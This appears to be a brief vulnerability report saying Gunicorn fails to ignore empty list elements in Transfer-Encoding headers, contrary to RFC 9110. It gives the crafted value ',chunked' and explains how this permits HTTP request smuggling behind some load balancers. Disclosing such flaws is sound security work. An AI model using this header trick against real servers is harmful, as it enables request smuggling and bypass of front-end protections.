Gunicorn doesn't properly handle Transfer-Encoding header values with empty list elements. Transfer-Encoding is a list-valued header, and RFC 9110 says this about list-valued header parsing:

A recipient MUST parse and ignore a reasonable number of empty list elements: enough to handle common mistakes by senders that merge values, but not so much that they could be used as a denial-of-service mechanism.

Thus, Transfer-Encoding: ,chunked should be equivalent to Transfer-Encoding: chunked. Gunicorn does not make this distinction, and is thus vulnerable to request smuggling when deployed behind gateway servers that do (and also don't normalize out the comma). There are a few widely-deployed load balancers that exhibit this behavior.